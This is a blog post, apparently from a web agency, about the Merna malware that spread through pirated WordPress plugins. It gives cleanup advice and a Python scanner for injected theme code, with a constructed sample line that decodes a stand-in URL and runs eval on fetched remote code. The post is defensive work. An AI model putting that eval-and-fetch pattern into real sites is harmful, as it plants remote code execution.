Malware: the reason not to download premium widgets from questionable sources

About a year ago we started a small test / pet project and ran it privately on a shared hosting account.

We brought in a contractor to do some development on it for us, which required some paid plugins. Instead of buying them, he downloaded them from "someplace" (but billed us for them anyway), as we determined later, because within a few weeks every single domain hosted on our shared server had the same malicious code injected into the functions.php file of every one of our themes.

It's referred to as Merna, and it's not new, but it seems to come back, time and time again.

This malware has been around since at least 2017, as far as we can tell, and I'm bringing it up now because a year after we cleaned our system, I debugged two additional sites this week that had this code injected into the functions file. (I can't remember whether we cleaned that particular domain/WordPress install last year, but on a shared hosting plan every site runs under the same account, so a script injected into one site can write to the others' files and the malware hops between them.)

This write-up describes how it functions and what it does in greater detail; it's the article we initially found when we saw the injected code in the functions file.

PRO TIP: If you're not a developer and are trying to clean up injected code, look at the injected code and pick out the URL it's sending information to or pulling code from. There almost always is one, although it may be hidden inside a base64-encoded string rather than written in plain text. Then search for that domain online. Other developers will most likely have used the same URL as an identifier for the same infection, and their write-ups can walk you through the additional files that need examining. If this scares you, get some help doing this.
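As an added example (not code from the original post or from the article it quotes), here is a small scanner that does the pro tip mechanically: it walks a hosting account looking for every theme's functions.php, flags the PHP calls that injected code typically leans on (eval, base64_decode, file_get_contents and friends), and pulls out every URL it can find, including URLs hidden inside base64-encoded string literals. The sample functions.php content, the domain c2-host.example and the theme URL in it are constructed stand-ins, not the real payload.

```python
"""Scan WordPress theme functions.php files for injected code and extract the
URLs it references, decoding base64 string literals so hidden URLs show up too."""
import base64
import re
import sys
from pathlib import Path

# PHP calls that legitimate theme code rarely needs but injected code relies on.
SUSPICIOUS_CALLS = (
    "eval", "assert", "create_function", "base64_decode",
    "gzinflate", "str_rot13", "file_get_contents", "curl_exec",
)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
# A quoted run of base64 characters long enough to hold something interesting.
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_b64_literals(source):
    """Return the UTF-8 text of every base64-looking string literal in source."""
    decoded = []
    for match in B64_RE.finditer(source):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore it
    return decoded


def extract_iocs(source):
    """Collect plain and base64-hidden URLs plus the suspicious calls used."""
    urls = set(URL_RE.findall(source))
    for text in decode_b64_literals(source):
        urls.update(URL_RE.findall(text))
    calls = sorted(
        name for name in SUSPICIOUS_CALLS
        if re.search(r"\b" + re.escape(name) + r"\s*\(", source)
    )
    return {"urls": sorted(urls), "suspicious_calls": calls}


def scan_tree(root):
    """Map every functions.php under root that has findings to its IOCs."""
    findings = {}
    for path in Path(root).rglob("functions.php"):
        iocs = extract_iocs(path.read_text(errors="replace"))
        if iocs["urls"] or iocs["suspicious_calls"]:
            findings[str(path)] = iocs
    return findings


# Constructed sample: a few lines of ordinary theme code followed by a stand-in
# for an injected block. The domain is invented; this is not the real payload.
_ENCODED_URL = base64.b64encode(b"http://c2-host.example/admin.txt").decode()
SAMPLE_FUNCTIONS_PHP = (
    "<?php\n"
    "// Theme URI: https://example.org/theme  (legitimate reference)\n"
    "add_action('wp_enqueue_scripts', 'mytheme_scripts');\n"
    "function mytheme_scripts() { wp_enqueue_style('mytheme', get_stylesheet_uri()); }\n"
    "// --- constructed stand-in for an injected block ---\n"
    "$_x = base64_decode('" + _ENCODED_URL + "');\n"
    "eval(file_get_contents($_x));\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Point it at the account's web root, e.g. python scan.py ~/public_html
        for file, iocs in scan_tree(sys.argv[1]).items():
            print(file, iocs)
    else:
        print(extract_iocs(SAMPLE_FUNCTIONS_PHP))
```

The URL list will include legitimate references (theme URIs, wordpress.org links), so treat it as a triage list: a URL that only appears next to eval or base64_decode is the one to search for. Run it against the whole account, not one site, since every theme on the shared host was hit at once.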

Here's a quote from that article:

This file, when accessed by an admin during plugin activation, would carry out a number of tasks. The more notable / important are:

  1. Create a unique “install hash” and “install password”, which are seemingly registered in the attacker's database of victims for future use
  2. The content of the admin.txt file being hosted on the www.merna.cc domain will be injected into every theme's functions.php file. If one does not exist, it will be created during the bootstrapping of the malware.
  3. Code is injected into the same set of files, to allow for a remote user to patch up the files to point to a new domain.

The biggest thing about cleaning injected code is not getting totally freaked out about doing it. If you have some understanding of PHP, can tell where the injected code starts and ends, and have a sense of what looks "off", you can learn to navigate your way around it. Just clean every theme on every site on the account in one pass: one copy left behind is enough to reinfect the rest.

If you are totally NOT cool doing this, no problem. Our team cleans stuff like this for our clients all the time, so get in touch. Remember that even with security plugins installed, you can't protect yourself from malware you install on the server yourself. Right? Right. (We didn't keep him around for other projects.)
